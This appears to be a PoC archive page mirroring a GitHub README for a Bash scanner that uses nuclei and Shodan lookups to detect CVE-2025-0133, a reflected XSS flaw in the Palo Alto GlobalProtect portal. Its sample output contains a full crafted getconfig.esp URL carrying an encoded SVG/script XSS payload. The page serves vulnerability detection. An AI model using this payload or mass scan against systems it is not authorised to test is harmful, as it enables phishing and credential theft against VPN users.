Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-0133 PoC — PAN-OS: Reflected Cross-Site Scripting (XSS) Vulnerability in GlobalProtect Gateway and Portal

Source
https://github.com/INTELEON404/CVE-2025-0133
Associated Vulnerability
Title:PAN-OS: Reflected Cross-Site Scripting (XSS) Vulnerability in GlobalProtect Gateway and Portal (CVE-2025-0133)
Description:A reflected cross-site scripting (XSS) vulnerability in the GlobalProtect™ gateway and portal features of Palo Alto Networks PAN-OS® software enables execution of malicious JavaScript in the context of an authenticated Captive Portal user's browser when they click on a specially crafted link. The primary risk is phishing attacks that can lead to credential theft—particularly if you enabled Clientless VPN. There is no availability impact to GlobalProtect features or GlobalProtect users. Attackers cannot use this vulnerability to tamper with or modify contents or configurations of the GlobalProtect portal or gateways. The integrity impact of this vulnerability is limited to enabling an attacker to create phishing and credential-stealing links that appear to be hosted on the GlobalProtect portal. For GlobalProtect users with Clientless VPN enabled, there is a limited impact on confidentiality due to inherent risks of Clientless VPN that facilitate credential theft. You can read more about this risk in the informational bulletin PAN-SA-2025-0005 https://security.paloaltonetworks.com/PAN-SA-2025-0005 https://security.paloaltonetworks.com/PAN-SA-2025-0005 . There is no impact to confidentiality for GlobalProtect users if you did not enable (or you disable) Clientless VPN.
Description
Reflected XSS vulnerability found in Palo Alto GlobalProtect Gateway & Portal. Attackers can inject malicious scripts via crafted requests.
Readme
# CVE-2025-0133 Vulnerability Scanner

A Bash-based automated scanner tool for detecting the **CVE-2025-0133** Reflected XSS vulnerability in **Palo Alto GlobalProtect Gateway & Portal** using `nuclei` and `shodanx`.

---

**Author**:  
<p align="center">
  <a href="https://github.com/INTELEON404">
    <img title="Github" src="https://img.shields.io/badge/INTELEON404-red?style=for-the-badge&logo=github">
  </a>
</p>

**Date**: 2025-06-23  
**Severity**: Medium  
**CVE ID**: CVE-2025-0133  
**Vulnerability Type**: Reflected Cross-Site Scripting (XSS)  
**Tested Against**: Palo Alto Networks GlobalProtect Portal (PAN-OS)  

---

## Overview

This tool helps penetration testers and security researchers quickly identify vulnerable domains or IPs related to the CVE-2025-0133 issue.  
It leverages `nuclei` templates and Shodan query integration (`shodanx`) to find and scan targets efficiently.

---

## Features

- Automatically detects if input is a single domain or a file containing multiple domains/IPs  
- Runs `shodanx` on single domains to gather related hosts  
- Uses `nuclei` with a custom CVE-2025-0133 template to scan targets  
- Displays scan results in a clean tabular format on the command line  
- Shows scan start and end times  
- Prompts to save results in both `.txt` and `.json` formats  
- Built-in help and usage instructions

---

## Requirements

- Linux environment with Bash shell  
- [nuclei](https://nuclei.projectdiscovery.io/) installed and accessible in `$PATH`  
- [shodanx](https://github.com/RevoltSecurities/ShodanX)) installed and configured  
- The `CVE-2025-0133` nuclei template file located at:  
  `/home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml` (update path as needed)
  
## 📦 Required Tools Installation

### 🔹 1. Install [ShodanX](https://github.com/RevoltSecurities/ShodanX)

```bash
pip install git+https://github.com/RevoltSecurities/ShodanX 
```
>**If the error shows**: "error: externally-managed-environment"
```bash
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
````
> ⚠️ **Note:**
> `--break-system-packages` option is needed on some systems (especially Debian/Ubuntu) to allow pip to install packages outside a virtual environment without permission errors.

👉 Make sure `shodanx` is available in your `$PATH`.
You can test it with:

```bash
shodanx -h
```

### 🔹 2. Install [Nuclei](https://github.com/projectdiscovery/nuclei)

```bash
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
```

Check if installed:

```bash
nuclei -version
```

Then update the templates:

```bash
nuclei -update-templates
```

---

## Usage

```bash
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h 
Usage: ./cve20250133.sh <domain-or-file>

Scan CVE-2025-0133 vulnerabilities using nuclei and shodanx.
If input is a file, scan domains/IPs from the file.
If input is a domain, run shodanx to find related IPs/domains and scan them.

Options:
  -h, --help, help     Show this help message and exit.

````

---

## Examples

### Scan a single domain

```bash
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Scan Start Time: 2025-06-24 16:33:51


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Input is a single domain: domain.com — Running ShodanX first
     _                               _      
    | |            |                (_\  /  
 ,  | |     __   __|   __,   _  _      \/   
/ \_|/ \   /  \_/  |  /  |  / |/ |     /\   
 \/ |   |_/\__/ \_/|_/\_/|_/  |  |_/ _/  \_/
                                            
                                            

                     - RevoltSecurities

[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
```

### Scan from a file

```bash
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt       
Scan Start Time: 2025-06-24 16:36:37


▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖  ▙▖█▌▙▖▄▌  █▌▟▖▄▌▄▌
                          
-INTELEON404


[✔] Input is a file: file.txt — Skipping ShodanX
[*] Scanning domain 123.45.67.890 ...

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.5

        projectdiscovery.io

[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
```

---

## CVE-2025-0133 Details

Reflected Cross-Site Scripting (XSS) vulnerability in Palo Alto GlobalProtect Gateway & Portal allowing attackers to inject malicious scripts via crafted requests.
Patch your systems by updating to the latest Palo Alto Networks releases to mitigate this issue.

---

## License

This project is licensed under the MIT License - see the [LICENSE](LICENSE) file for details.
File Snapshot

 [4.0K]  /data/pocs/4e5c2cb7c0b6e7a460bcf47a4403ead0fb9f21af
├── [3.5K]  cve20250133.sh
├── [1.0K]  LICENSE
└── [7.1K]  README.md

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →